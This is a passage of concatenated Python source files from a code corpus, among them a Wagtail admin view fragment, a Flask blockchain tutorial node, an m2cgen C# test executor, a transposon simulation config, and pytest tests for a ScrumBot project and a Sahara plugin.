content_type_app_name, content_type_model_name
)
except ContentType.DoesNotExist:
raise Http404
page_class = content_type.model_class()
# page_class must be a Page type and not some other random model
if not issubclass(page_class, Page):
raise Http404
pages = page_class.objects.all().specific(defer=True)
paginator = Paginator(pages, per_page=10)
pages = paginator.get_page(request.GET.get("p"))
return TemplateResponse(
request,
"wagtailadmin/pages/content_type_use.html",
{
"pages": pages,
"app_name": content_type_app_name,
"content_type": content_type,
"page_class": page_class,
},
)
|
py | b4111a024602d8e6971dde5f36849ca1db47e89c | class Booking:
def __init__(self, id = None, datetime_start = None, datetime_end = None, entry_time = None, exit_time = None, amount = None, id_user = None, id_vehicle = None, id_parking_slot = None, note = ""):
self._id = id
self._datetime_start = datetime_start
self._datetime_end = datetime_end
self._entry_time = entry_time
self._exit_time = exit_time
self._amount = amount
self._id_user = id_user
self._id_vehicle = id_vehicle
self._id_parking_slot = id_parking_slot
self._note = note
def set_id(self, id):
self._id = id
def set_datetime_start(self, datetime_start):
self._datetime_start = datetime_start
def set_datetime_end(self, datetime_end):
self._datetime_end = datetime_end
def set_entry_time(self, entry_time):
self._entry_time = entry_time
def set_exit_time(self, exit_time):
self._exit_time = exit_time
# def set_amount(self, amount):
# self._amount = amount
# def set_id_user(self, id_user):
# self._id_user = id_user
#
# def set_id_vehicle(self, id_vehicle):
# self._id_vehicle = id_vehicle
#
# def set_id_parking_slot(self, id_parking_slot):
# self._id_parking_slot = id_parking_slot
def set_note(self, note):
self._note = note
def get_id(self):
return self._id
def get_datetime_start(self):
return self._datetime_start
def get_datetime_end(self):
return self._datetime_end
def get_entry_time(self):
return self._entry_time
def get_exit_time(self):
return self._exit_time
def get_amount(self):
return self._amount
def get_id_user(self):
return self._id_user
def get_id_vehicle(self):
return self._id_vehicle
def get_id_parking_slot(self):
return self._id_parking_slot
def get_note(self):
return self._note
def __eq__(self, other):
if isinstance(other, Booking):
return self._id == other._id
return NotImplemented
def __str__(self):
booking_info = (f"Booking Id: {self._id}, datetime start: {self._datetime_start}, datetime end: {self._datetime_end}, entry time: {self._entry_time}, "
f"exit time: {self._exit_time}, amount: {self._amount}, id user: {self._id_user}, id vehicle: {self._id_vehicle}, "
f"id parking slot: {self._id_parking_slot}, note: {self._note}")
return booking_info
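# Illustrative usage (not part of the original module):
#   booking = Booking(id=1, datetime_start="2021-06-01 09:00", datetime_end="2021-06-01 11:00",
#                     id_user=7, id_vehicle=3, id_parking_slot=12)
#   print(booking)               # formatted via __str__ above
#   booking == Booking(id=1)     # True: equality compares only the id (see __eq__)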
|
py | b4111a6a37b74b29162256b26f67991e1c393123 | import hashlib, json, requests
from time import time
from uuid import uuid4
from textwrap import dedent
from flask import Flask, jsonify, request
from urllib.parse import urlparse
# block = {
# 'index': 1,
# 'timestamp': 1506057125.900785,
# 'transactions': [
# {
# 'sender': "8527147fe1f5426f9dd545de4b27ee00",
# 'recipient': "a77f5cdfa2934df3954a5c7c7da5df1f",
# 'amount': 5,
# }
# ],
# 'proof': 324984774000,
# 'previous_hash': "2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e5c1fa7425e73043362938b9824"
# }
class Blockchain(object):
def __init__(self):
self.chain = []
self.current_transactions = []
self.nodes = set()
        # The genesis block
self.newBlock(previous_hash=1, proof=100)
def newBlock(self, proof, previous_hash=None):
block = {
'index': len(self.chain) + 1,
'timestamp': time(),
'transactions': self.current_transactions,
'proof': proof,
'previous_hash': previous_hash or self.hash(self.chain[-1])
}
        self.current_transactions = [] # Reset the list of pending transactions
        self.chain.append(block) # Append the block to the chain
return block
def newTransaction(self, sender, recipient, amount):
self.current_transactions.append({
'sender': sender,
'recipient': recipient,
'amount': amount
        }) # Add the transaction to the pending list
        return self.lastBlock['index'] + 1 # Return the index of the block that will hold this transaction
@staticmethod
def hash(block):
        blockString = json.dumps(block, sort_keys=True).encode() # The dict is sorted by keys to prevent inconsistent hashes
        return hashlib.sha256(blockString).hexdigest() # Hash the block and return the hex digest string
    def proofOfWork(self, last_proof): # Generate the block's PoW
        # Algorithm:
        # - Find a number p' such that the hash of p' together with the previous block's proof starts with [n] leading zeros.
proof = 0
while self.validProof(last_proof, proof) is False:
proof += 1
return proof
@staticmethod
    def validProof(last_proof, proof): # Validate the PoW
guess = f'{last_proof}{proof}'.encode()
guess_hash = hashlib.sha256(guess).hexdigest()
return guess_hash[:4] == "0000"
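    # The four leading zeros required above fix the mining difficulty; demanding more
    # leading zeros makes finding a valid proof exponentially harder.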
def registerNode(self, address):
parsed_url = urlparse(address)
self.nodes.add(parsed_url.netloc)
def validChain(self, chain):
lastBlock = chain[0]
currentIndex = 1
while currentIndex < len(chain):
block = chain[currentIndex]
print(f'{lastBlock}')
print(f'{block}')
print(f'\n-----------\n')
            # Check that the block's hash is correct
            if block['previous_hash'] != self.hash(lastBlock):
                return False
            # Check that the PoW is correct
            if not self.validProof(lastBlock['proof'], block['proof']):
                return False
            lastBlock = block
currentIndex += 1
return True
def resolveConflicts(self):
        # This function implements the consensus algorithm: it resolves conflicts between nodes by replacing the current chain with the longest valid one on the network.
neighbours = self.nodes
newChain = None
maxLength = len(self.chain)
for node in neighbours:
response = requests.get(f"http://{node}/chain")
if response.status_code == 200:
length = response.json()['length']
chain = response.json()['chain']
                # Check whether the chain is longer than ours and whether it is valid
if length > maxLength and self.validChain(chain):
maxLength = length
newChain = chain
        # Replace our chain if a new valid, longer chain was discovered
if newChain:
self.chain = newChain
return True
return False
@property
def lastBlock(self):
return self.chain[-1]
# Node
app = Flask(__name__)
# Generate a globally unique (random) address for this node
nodeId = str(uuid4()).replace('-', '')
# Instantiate the blockchain
blockchain = Blockchain()
# Create the API endpoints
@app.route('/mine', methods=['GET'])
def mine():
    # To-do
    # - Compute the PoW
    # - Reward the miner by adding a transaction granting 1 coin
    # - Create a new block and add it to the chain / blockchain
    # Compute the PoW
lastBlock = blockchain.lastBlock
lastProof = lastBlock['proof']
proof = blockchain.proofOfWork(lastProof)
    # Reward the miner by adding a transaction granting 1 coin; the 'sender' is "0" to indicate that this node mined a new coin
blockchain.newTransaction(
sender = "0",
recipient = nodeId,
amount = 1
)
    # Create a new block and add it to the chain / blockchain
previousHash = blockchain.hash(lastBlock)
block = blockchain.newBlock(proof, previousHash)
    # API endpoint response
response = {
'message': "Novo bloco criado",
'index': block['index'],
'transactions': block['transactions'],
'proof': block['proof'],
'previous_hash': block['previous_hash']
}
return jsonify(response), 200
@app.route('/transactions/new', methods=['POST'])
def newTranscation():
values = request.get_json()
    # Check that all required fields were provided
required = ['sender', 'recipient', 'amount']
if not all(k in values for k in required):
return 'Valores faltando', 400
    # Create the transaction
index = blockchain.newTransaction(values['sender'], values['recipient'], values['amount'])
    response = {'message': f'A transação vai ser adicionada ao bloco {index}'} # Endpoint response message
return jsonify(response), 201
@app.route('/chain', methods=['GET'])
def fullChain():
response = {
'chain': blockchain.chain,
'length': len(blockchain.chain),
}
return jsonify(response), 200
@app.route('/nodes/register', methods=['POST'])
def registerNodes():
values = request.get_json()
nodes = values.get('nodes')
if nodes is None:
return "Erro: É necessário que uma lista válida de Nodes seja passada", 400
for node in nodes:
blockchain.registerNode(node)
response = {
'message': 'Novos Nodes foram adicionados',
'total_nodes': list(blockchain.nodes)
}
return jsonify(response), 201
@app.route('/nodes/resolve', methods=['GET'])
def consensus():
replaced = blockchain.resolveConflicts()
if replaced:
response = {
'message': 'A cadeia foi trocada',
'new_chain': blockchain.chain
}
else:
response = {
'message': 'A cadeia permanece a mesma',
'chain': blockchain.chain
}
return jsonify(response), 200
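# Illustrative interaction with the endpoints above (responses will vary per run):
#   curl http://localhost:5000/mine
#   curl -X POST -H "Content-Type: application/json" \
#        -d '{"sender": "abc", "recipient": "def", "amount": 5}' http://localhost:5000/transactions/new
#   curl http://localhost:5000/chain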
# Run the node
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000) |
py | b4111ae0bfc1c440afe858ea9f8af7fc7dd02849 | import os
import subprocess
from m2cgen import assemblers, interpreters
from tests import utils
from tests.e2e.executors import base
EXECUTOR_CODE_TPL = """
using System;
namespace TestConsoleApp {{
class Program {{
static void Main(string[] args) {{
double[] input_ = new double[args.Length];
for(int i = 0; i < input_.Length; ++i) {{
input_[i] = double.Parse(args[i]);
}}
{print_code}
}}
}}
}}
"""
EXECUTE_AND_PRINT_SCALAR = """
double res = ML.Model.Score(input_);
Console.Write(res);
"""
EXECUTE_AND_PRINT_VECTOR = """
double[] res = ML.Model.Score(input_);
for(int i = 0; i < res.Length; ++i) {
Console.Write("{0} ", res[i]);
}
"""
class CSharpExecutor(base.BaseExecutor):
target_exec_dir = None
project_name = "test_model"
_dotnet = "dotnet"
def __init__(self, model):
self.model = model
self.interpreter = interpreters.CSharpInterpreter()
assembler_cls = assemblers.get_assembler_cls(model)
self.model_ast = assembler_cls(model).assemble()
def predict(self, X):
exec_args = [os.path.join(self.target_exec_dir, self.project_name)]
exec_args.extend(map(utils.format_arg, X))
return utils.predict_from_commandline(exec_args)
@classmethod
def prepare_global(cls, **kwargs):
super().prepare_global(**kwargs)
if cls.target_exec_dir is None:
cls.target_exec_dir = os.path.join(cls._global_tmp_dir, "bin")
subprocess.call([cls._dotnet,
"new",
"console",
"--output",
cls._global_tmp_dir,
"--name",
cls.project_name,
"--language",
"C#"])
def prepare(self):
if self.model_ast.output_size > 1:
print_code = EXECUTE_AND_PRINT_VECTOR
else:
print_code = EXECUTE_AND_PRINT_SCALAR
executor_code = EXECUTOR_CODE_TPL.format(
print_code=print_code)
model_code = self.interpreter.interpret(self.model_ast)
model_file_name = os.path.join(self._global_tmp_dir, "Model.cs")
executor_file_name = os.path.join(self._global_tmp_dir, "Program.cs")
with open(model_file_name, "w") as f:
f.write(model_code)
with open(executor_file_name, "w") as f:
f.write(executor_code)
subprocess.call([self._dotnet,
"build",
os.path.join(self._global_tmp_dir,
f"{self.project_name}.csproj"),
"--output",
self.target_exec_dir])
|
py | b4111affd08408261146446af27a1c333ae0160c |
# parameters.py
"""
Exp 557 - {'Initial_genes': '5000', 'Host_mutation_rate': '0.30', 'TE_progeny': '0.00, 0, 0.55, 1, 0.30, 2, 0.15, 3', 'TE_Insertion_Distribution': 'Triangle( pmax=0, pzero=3.0/3.0 )', 'Carrying_capacity': '30', 'TE_excision_rate': '0.1', 'Junk_BP': '1.4', 'Gene_Insertion_Distribution': 'Triangle( pzero=1.0/3.0, pmax=1 )', 'mutation_effect': '0.10', 'TE_death_rate': '0.0005'}
"""
from TEUtil import *;
# note that "#" indicates a comment
# set the following to True if you want messages printed to the screen
# while the program runs - search for these keywords in TESim.py to see
# what each one prints out
output = {
"SPLAT": False,
"SPLAT FITNESS": False,
"INITIALIZATION": False,
"GENERATION": True,
"HOST EXTINCTION": True,
"TE EXTINCTION": True,
"TRIAL NO": True,
"GENE INIT": False,
"TE INIT": False,
};
TE_Insertion_Distribution = Triangle( pmax=0, pzero=3.0/3.0 );
Gene_Insertion_Distribution = Triangle( pzero=1.0/3.0, pmax=1 );
# Triangle( pmax, pzero ) generates values between pmax and pzero with
# a triangular probability distribution, where pmax is the point of highest
# probability, and pzero is the point of lowest probability
# - you can change the orientation of the triangle by reversing the values
# of pmax and pzero
# Flat() generates values between 0 and 1 with uniform probability
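# Example: Triangle( pmax=0, pzero=1.0 ) draws values in [0, 1] that are most likely near 0
# and vanishingly unlikely near 1, whereas Flat() makes every position equally likely.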
Gene_length = 1000; # use 1000?
TE_length = 1000; # use 1000?
TE_death_rate = 0.0005;
TE_excision_rate = 0.1; # set this to zero for retro transposons
# for retro transposons this is the probability of the given number of progeny
# for dna transposons this is the probability of the given number of progeny
# ___PLUS___ the original re-inserting
TE_progeny = ProbabilityTable( 0.00, 0, 0.55, 1, 0.30, 2, 0.15, 3 );
Initial_genes = 5000;
Append_gene = True; # True: when the initialization routine tries to place
# a gene inside another gene, it instead appends it
# at the end of the original gene (use this with small
# amounts of Junk_BP).
                    # False: when the initialization routine tries to place
# a gene inside another gene, try to place it somewhere
                    # else again (don't use this option with small amounts
# of Junk_BP).
Initial_TEs = 1;
MILLION = 1000000;
Junk_BP = 1.4 * MILLION;
Host_start_fitness = 1.0;
Host_mutation_rate = 0.30;
Host_mutation = ProbabilityTable( 0.40, lambda fit: 0.0,
0.30, lambda fit: fit - random.random()*0.10,
0.15, lambda fit: fit,
0.15, lambda fit: fit + random.random()*0.10
);
# what happens when a TA hits a gene
Insertion_effect = ProbabilityTable(0.30, lambda fit: 0.0,
0.20, lambda fit: fit - random.random()*0.10,
0.30, lambda fit: fit,
0.20, lambda fit: fit + random.random()*0.10
);
Carrying_capacity = 30;
Host_reproduction_rate = 1; # how many offspring each host has
Host_survival_rate = lambda propfit: min( Carrying_capacity * propfit, 0.95 );
# propfit = proportion of fitness owned by this individual
Maximum_generations = 1500;
Terminate_no_TEs = True; # end simulation if there are no TEs left
# seed = 0;
seed = None; # if seed = None, the random number generator's initial state is
# set "randomly"
save_frequency = 50; # Frequency with which to save the state of the experiment
saved = None; # if saved = None then we start a new simulation from scratch
# if saves = string, then we open that file and resume a simulation
|
py | b4111c3d64babf65f453f1c3a3853fc05c4d49f0 | from output.models.ms_data.group.group_j004_xsd.group_j004 import (
Doc,
Elem,
)
__all__ = [
"Doc",
"Elem",
]
|
py | b4111c66d3d802f08b48cdff3a0c002afae77ee7 | from collections import Counter
for _ in xrange(int(raw_input())):
alice = Counter(''.join(raw_input().split()))
bob = Counter(''.join(raw_input().split()))
a = Counter(alice-bob)
b = Counter(bob-alice)
if sum(a.values()) != 0 and sum(b.values()) != 0:
print 'You draw some.'
elif sum(a.values()) == 0:
print 'You lose some.'
elif sum(b.values()) == 0:
print 'You win some.'
|
py | b4111d688500c9d3309b999110e5e73f7072feb3 | # Copyright (c) 2015 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from sahara.plugins.hdp import confighints_helper as ch_helper
from sahara.tests.unit import base as sahara_base
SAMPLE_CONFIG = {
'configurations': [
{
'tag': 'tag1.xml',
'properties': [
{
'name': 'prop1',
'default_value': '1234',
'description': 'the first property of tag1'
},
{
'name': 'prop2',
'default_value': '5678',
'description': 'the second property of tag1'
}
]
},
{
'tag': 'tag2.xml',
'properties': [
{
'name': 'prop3',
'default_value': '0000',
'description': 'the first property of tag2'
}
]
}
]
}
class ConfigHintsHelperTest(sahara_base.SaharaTestCase):
@mock.patch(
'sahara.plugins.hdp.confighints_helper.load_hadoop_json_for_tag',
wraps=ch_helper.load_hadoop_json_for_tag)
@mock.patch(
'sahara.plugins.hdp.confighints_helper.load_json_file',
return_value=SAMPLE_CONFIG)
def test_get_possible_hive_config_from(self,
load_json_file,
load_hadoop_json_for_tag):
expected_config = {
'configs': [],
'params': {}
}
actual_config = ch_helper.get_possible_hive_config_from(
'sample-file-name.json')
load_hadoop_json_for_tag.assert_called_once_with(
'sample-file-name.json', 'hive-site.xml')
self.assertEqual(expected_config, actual_config)
@mock.patch(
'sahara.service.edp.oozie.workflow_creator.workflow_factory.'
'get_possible_mapreduce_configs',
return_value=[])
@mock.patch(
'sahara.plugins.hdp.confighints_helper.load_hadoop_json_for_tag',
wraps=ch_helper.load_hadoop_json_for_tag)
@mock.patch(
'sahara.plugins.hdp.confighints_helper.load_json_file',
return_value=SAMPLE_CONFIG)
def test_get_possible_mapreduce_config_from(self,
load_json_file,
load_hadoop_json_for_tag,
get_poss_mr_configs):
expected_config = {
'configs': []
}
actual_config = ch_helper.get_possible_mapreduce_config_from(
'sample-file-name.json')
load_hadoop_json_for_tag.assert_called_once_with(
'sample-file-name.json', 'mapred-site.xml')
get_poss_mr_configs.assert_called_once_with()
self.assertEqual(expected_config, actual_config)
@mock.patch(
'sahara.plugins.hdp.confighints_helper.load_hadoop_json_for_tag',
wraps=ch_helper.load_hadoop_json_for_tag)
@mock.patch(
'sahara.plugins.hdp.confighints_helper.load_json_file',
return_value=SAMPLE_CONFIG)
def test_get_possible_pig_config_from(self,
load_json_file,
load_hadoop_json_for_tag):
expected_config = {
'configs': [],
'args': [],
'params': {}
}
actual_config = ch_helper.get_possible_pig_config_from(
'sample-file-name.json')
load_hadoop_json_for_tag.assert_called_once_with(
'sample-file-name.json', 'mapred-site.xml')
self.assertEqual(expected_config, actual_config)
def test_get_properties_for_tag(self):
expected_properties = [
{
'name': 'prop1',
'default_value': '1234',
'description': 'the first property of tag1'
},
{
'name': 'prop2',
'default_value': '5678',
'description': 'the second property of tag1'
}
]
actual_properties = ch_helper.get_properties_for_tag(
SAMPLE_CONFIG['configurations'], 'tag1.xml')
self.assertEqual(expected_properties, actual_properties)
@mock.patch(
'sahara.plugins.hdp.confighints_helper.load_json_file',
return_value=SAMPLE_CONFIG)
def test_load_hadoop_json_for_tag(self, load_json_file):
expected_configs = [
{
'name': 'prop3',
'value': '0000',
'description': 'the first property of tag2'
}
]
actual_configs = ch_helper.load_hadoop_json_for_tag(
'sample-file-name.json', 'tag2.xml')
self.assertEqual(expected_configs, actual_configs)
|
py | b4111e012df1207bf2917703a396c7af7d954bc1 | ## @file test.py
# @author Arkin Modi, Leon So, Timothy Choy
# @brief Testing for ScrumBot
# @date Apr 5, 2020
import pytest
import task, sprint, meeting, project, dict
import projectList
import datetime
## @brief Functional Requirement Tests for BE1 (Test Plan Section 3.1.1)
class Test_FR_BE1:
# Installation Test Done Manually
pass
## @brief Functional Requirement Tests for BE2 (Test Plan Section 3.1.2)
class Test_FR_BE2:
## @brief Creates a test project and project list for each test
@pytest.fixture(autouse=True)
def setup_method(self):
self.test_project = project.Project("Name", "Description")
self.test_projectList = projectList.ProjectList()
    ## @brief Check if Name and Description are retrieved correctly
def test_create_project_and_getters(self):
assert(
self.test_project.get_name() == "Name" and
self.test_project.get_desc() == "Description"
)
    ## @brief Check if Name and Description are retrieved correctly for a project with no description
def test_create_project_and_getters_with_no_description(self):
test = project.Project("Name")
assert(
test.get_name() == "Name" and
test.get_desc() == "No description"
)
## @brief Add project to the project list
def test_add_project_to_list(self):
self.test_projectList.add(self.test_project)
assert(self.test_projectList.to_seq()[0][1] == self.test_project)
## @brief Functional Requirement Tests for BE3 (Test Plan Section 3.1.3)
class Test_FR_BE3:
## @brief Creates a test project and project list for each test
@pytest.fixture(autouse=True)
def setup_method(self):
self.test_project = project.Project("Name", "Description")
self.test_projectList = projectList.ProjectList()
self.test_projectList.add(self.test_project)
    ## @brief Checks if it can remove a project from the project list
def test_remove_project(self):
assert(self.test_projectList.to_seq()[0][1] == self.test_project)
self.test_projectList.remove(0)
assert(self.test_projectList.to_seq() == [])
## @brief Tries to remove a project that is not in the project list
def test_remove_project_not_in_list(self):
with pytest.raises(KeyError):
self.test_projectList.remove(1)
## @brief Functional Requirement Tests for BE4 (Test Plan Section 3.1.4)
class Test_FR_BE4:
## @brief Creates a test project for each test
@pytest.fixture(autouse=True)
def setup_method(self):
self.test_project = project.Project("Name", "Description")
## @brief Checks if the Task properties are retrieved correctly
def test_add_and_get_task(self):
self.test_project.add_sprint()
self.test_project.add_task("Name", "2020/01/01 00:00", "Details")
assert(
self.test_project.get_tasks(0)[0][1][0] == "Name" and
self.test_project.get_tasks(0)[0][1][1] == "Jan 01, 2020 at 12:00 AM" and
self.test_project.get_tasks(0)[0][1][2] == "Details"
)
## @brief Checks if the Task properties are retrieved correctly
def test_add_and_get_task_with_no_details(self):
self.test_project.add_sprint()
self.test_project.add_task("Name", "2020/01/01 00:00")
assert(
self.test_project.get_tasks(0)[0][1][0] == "Name" and
self.test_project.get_tasks(0)[0][1][1] == "Jan 01, 2020 at 12:00 AM" and
self.test_project.get_tasks(0)[0][1][2] == "No details"
)
    ## @brief Tries to get the Tasks of a Sprint that is not in the list of Sprints
def test_get_tasks_of_sprint_not_in_list(self):
with pytest.raises(IndexError):
self.test_project.get_tasks(0)
## @brief Checks if a single Tasks properties are retrieved correctly
def test_get_single_task(self):
self.test_project.add_sprint()
self.test_project.add_task("Name", "2020/01/01 00:00", "Details")
assert(
self.test_project.get_task(0, 0)[0] == "Name" and
self.test_project.get_task(0, 0)[1] == "Jan 01, 2020 at 12:00 AM" and
self.test_project.get_task(0, 0)[2] == "Details"
)
## @brief Tries to add a Task to a Sprint that does not exist
def test_add_task_with_no_sprint(self):
with pytest.raises(IndexError):
self.test_project.add_task("Name", "2020/01/01 00:00", "Details")
## @brief Tries to get a single Task of a Sprint that is not in the list of Sprints
def test_get_task_with_no_sprint(self):
with pytest.raises(IndexError):
self.test_project.get_task(0, 0)
## @brief Checks if Feedback is retrieved correctly
def test_add_and_get_feedback(self):
self.test_project.add_sprint()
self.test_project.add_task("Name", "2020/01/01 00:00", "Details")
self.test_project.add_feedback(0, "Feedback")
assert(
self.test_project.get_feedback(0, 0) == ["Feedback"]
)
## @brief Tries to add Feedback to a Sprint that is not in the list of Sprints
def test_add_feedback_with_no_sprint(self):
with pytest.raises(IndexError):
self.test_project.add_feedback(0, "Feedback")
    ## @brief Tries to get Feedback from a Sprint that is not in the list of Sprints
def test_get_feedback_with_no_sprint(self):
with pytest.raises(IndexError):
self.test_project.get_feedback(0, "Feedback")
## @brief Functional Requirement Tests for BE5 (Test Plan Section 3.1.5)
class Test_FR_BE5:
## @brief Creates a test project for each test
@pytest.fixture(autouse=True)
def setup_method(self):
self.test_project = project.Project("Name", "Description")
## @brief Checks if Task is removed
def test_rm_task(self):
self.test_project.add_sprint()
self.test_project.add_task("Name", "2020/01/01 00:00", "Details")
assert(
self.test_project.get_tasks(0)[0][1][0] == "Name" and
self.test_project.get_tasks(0)[0][1][1] == "Jan 01, 2020 at 12:00 AM" and
self.test_project.get_tasks(0)[0][1][2] == "Details"
)
self.test_project.rm_task(0)
assert(
self.test_project.get_tasks(0) == []
)
## @brief Tries to remove a Task of a Sprint that is not in the list of Sprints
def test_rm_task_with_no_sprint(self):
with pytest.raises(IndexError):
self.test_project.rm_task(0)
## @brief Tries to remove a Task that is not in the list of Tasks
def test_rm_task_that_is_not_in_task_list(self):
with pytest.raises(KeyError):
self.test_project.add_sprint()
self.test_project.rm_task(0)
## @brief Checks if the Task's details can be updated
def test_set_task_details(self):
self.test_project.add_sprint()
self.test_project.add_task("Name", "2020/01/01 00:00", "Details")
assert(self.test_project.get_tasks(0)[0][1][2] == "Details")
self.test_project.set_details(0, "New Details")
assert(self.test_project.get_tasks(0)[0][1][2] == "New Details")
## @brief Tries to update the details of a Task that does not exist
def test_set_task_details_of_empty_list_of_sprints(self):
with pytest.raises(IndexError):
self.test_project.set_details(0, "New Details")
## @brief Functional Requirement Tests for BE6 (Test Plan Section 3.1.6)
class Test_FR_BE6:
## @brief Creates a test project for each test
@pytest.fixture(autouse=True)
def setup_method(self):
self.test_project = project.Project("Name", "Description")
    ## @brief Checks if Feedback is removed
def test_rm_feedback(self):
self.test_project.add_sprint()
self.test_project.add_task("Name", "2020/01/01 00:00", "Details")
self.test_project.add_feedback(0, "Feedback")
assert(
self.test_project.get_feedback(0, 0) == ["Feedback"]
)
self.test_project.rm_feedback(0, 0)
assert(
self.test_project.get_feedback(0, 0) == []
)
## @brief Tries to remove Feedback from a Sprint that is not in the list of Sprints
def test_rm_feedback_with_no_sprint(self):
with pytest.raises(IndexError):
self.test_project.rm_feedback(0, 0)
## @brief Functional Requirement Tests for BE7 (Test Plan Section 3.1.7)
class Test_FR_BE7:
## @brief Creates a test project for each test
@pytest.fixture(autouse=True)
def setup_method(self):
self.test_project = project.Project("Name", "Description")
## @brief Checks if Requirement is retrieved correctly
def test_add_and_get_requirement(self):
self.test_project.add_rqe("Requirement")
assert(
self.test_project.get_rqes() == ["Requirement"]
)
## @brief Checks if Requirement is removed
def test_rm_requirement(self):
self.test_project.add_rqe("Requirement")
assert(self.test_project.get_rqes() == ["Requirement"])
self.test_project.rm_rqe(0)
assert(self.test_project.get_rqes() == [])
## @brief Tries to remove a Requirement that is not in the list of Requirements
def test_rm_requirement_not_in_list(self):
with pytest.raises(IndexError):
self.test_project.rm_rqe(0)
## @brief Functional Requirement Tests for BE8 (Test Plan Section 3.1.8)
class Test_FR_BE8:
## @brief Creates a test project for each test
@pytest.fixture(autouse=True)
def setup_method(self):
self.test_project = project.Project("Name", "Description")
self.test_project.add_meeting("Name", "2020/01/01 00:00", "grooming", "Description")
    ## @brief Checks if a Meeting's properties are retrieved correctly
def test_add_and_get_meeting(self):
assert(
self.test_project.get_meetings()[0][1][0] == "Name" and
self.test_project.get_meetings()[0][1][1] == "Jan 01, 2020 at 12:00 AM" and
self.test_project.get_meetings()[0][1][2] == "GROOMING"
)
    ## @brief Checks whether the Meeting name and description getters work correctly
def test_get_meeting_name_and_description(self):
assert(
self.test_project.get_meeting_name(0) == "Name" and
self.test_project.get_meeting_desc(0) == "Description"
)
    ## @brief Checks that the default description is used when no description is given
def test_get_meeting_with_no_description(self):
self.test_project.add_meeting("Name", "2020/01/01 00:00", "grooming")
assert(
self.test_project.get_meeting_desc(1) == "No description"
)
## @brief Tries to get the name of a Meeting that is not in the list of Meetings
def test_get_meeting_name_of_meeting_not_in_list(self):
with pytest.raises(KeyError):
self.test_project.get_meeting_name(2)
## @brief Tries to get the description of a Meeting that is not in the list of Meetings
def test_get_description_of_meeting_not_in_list(self):
with pytest.raises(KeyError):
self.test_project.get_meeting_desc(2)
## @brief Checks if all valid Meeting Types are correctly registered
def test_all_meeting_types(self):
self.test_project.add_meeting("Name", "2020/01/01 00:00", "grooming", "Description")
self.test_project.add_meeting("Name", "2020/01/01 00:00", "standup", "Description")
self.test_project.add_meeting("Name", "2020/01/01 00:00", "retrospective", "Description")
self.test_project.add_meeting("Name", "2020/01/01 00:00", "sprintplanning", "Description")
assert(
self.test_project.get_meetings()[1][1][2] == "GROOMING" and
self.test_project.get_meetings()[2][1][2] == "STANDUP" and
self.test_project.get_meetings()[3][1][2] == "RETROSPECTIVE" and
self.test_project.get_meetings()[4][1][2] == "SPRINTPLANNING"
)
## @brief Tries to register an invalid Meeting Type
def test_invalid_meeting_type(self):
with pytest.raises(TypeError):
self.test_project.add_meeting("Name", "2020/01/01 00:00", "dance", "Description")
## @brief Functional Requirement Tests for BE9 (Test Plan Section 3.1.9)
class Test_FR_BE9:
## @brief Creates a test project for each test
@pytest.fixture(autouse=True)
def setup_method(self):
self.test_project = project.Project("Name", "Description")
self.test_project.add_meeting("Name", "2020/01/01 00:00", "grooming", "Description")
## @brief Checks if Meeting was removed
def test_rm_meeting(self):
assert(
self.test_project.get_meetings()[0][1][0] == "Name" and
self.test_project.get_meetings()[0][1][1] == "Jan 01, 2020 at 12:00 AM" and
self.test_project.get_meetings()[0][1][2] == "GROOMING"
)
self.test_project.rm_meeting(0)
assert(
self.test_project.get_meetings() == []
)
## @brief Tries to remove a Meeting that is not in the list of Meetings
def test_rm_meeting_with_wrong_key(self):
with pytest.raises(KeyError):
self.test_project.rm_meeting(1)
## @brief Functional Requirement Tests for BE10 (Test Plan Section 3.1.10)
class Test_FR_BE10:
## @brief Creates a test project for each test
@pytest.fixture(autouse=True)
def setup_method(self):
self.test_project = project.Project("Name", "Description")
self.test_project.add_meeting("Name", "2020/01/01 00:00", "grooming", "Description")
self.test_project.add_meeting("Name", "2020/01/01 00:00", "standup", "Description")
self.test_project.add_meeting("Name", "2020/01/01 00:00", "retrospective", "Description")
self.test_project.add_meeting("Name", "2020/01/01 00:00", "sprintplanning", "Description")
## @brief Checks if all Meeting created are correctly retrieved
def test_view_all_meeting(self):
assert(
len(self.test_project.get_meetings()) == 4 and
self.test_project.get_meetings()[0][1][2] == "GROOMING" and
self.test_project.get_meetings()[1][1][2] == "STANDUP" and
self.test_project.get_meetings()[2][1][2] == "RETROSPECTIVE" and
self.test_project.get_meetings()[3][1][2] == "SPRINTPLANNING"
)
## @brief Functional Requirement Tests for BE11 (Test Plan Section 3.1.11)
class Test_FR_BE11:
## @brief Creates a test project for each test
@pytest.fixture(autouse=True)
def setup_method(self):
self.test_project = project.Project("Name", "Description")
self.test_project.add_sprint()
## @brief Checks if all Tasks created are correctly retrieved
def test_view_all_tasks(self):
self.test_project.add_task("1", "2020/01/01 00:00", "Details")
self.test_project.add_task("2", "2020/01/01 00:00", "Details")
self.test_project.add_task("3", "2020/01/01 00:00", "Details")
assert(
self.test_project.get_tasks(0)[0][1][0] == "1" and
self.test_project.get_tasks(0)[1][1][0] == "2" and
self.test_project.get_tasks(0)[2][1][0] == "3"
)
|
py | b4111ebf507793baa50967e5613db7ed75e948aa | # -*- coding: utf-8 -*-
"""Top-level package for cuttertest."""
__author__ = """Nhlavutelo Macebele"""
__email__ = '[email protected]'
__version__ = '0.0'
|
py | b4111f5bffa4c21e4749bbda50dad8593b14dc28 | import numpy as np
class Vector2D:
def __init__(self, x=0, y=0):
self.x = x
self.y = y
def __eq__(self, vector):
assert isinstance(vector, Vector2D)
return self.x == vector.x and self.y == vector.y
def __ne__(self, vector):
assert isinstance(vector, Vector2D)
return not (self == vector)
def __neg__(self):
return Vector2D(-self.x, -self.y)
def __abs__(self):
return Vector2D(abs(self.x), abs(self.y))
def __add__(self, vector):
assert isinstance(vector, Vector2D)
return Vector2D(self.x + vector.x, self.y + vector.y)
def __radd__(self, vector):
assert isinstance(vector, Vector2D)
return vector + self
def __iadd__(self, vector):
assert isinstance(vector, Vector2D)
self.x += vector.x
self.y += vector.y
return self
def __sub__(self, vector):
assert isinstance(vector, Vector2D)
return Vector2D(self.x - vector.x, self.y - vector.y)
def __rsub__(self, vector):
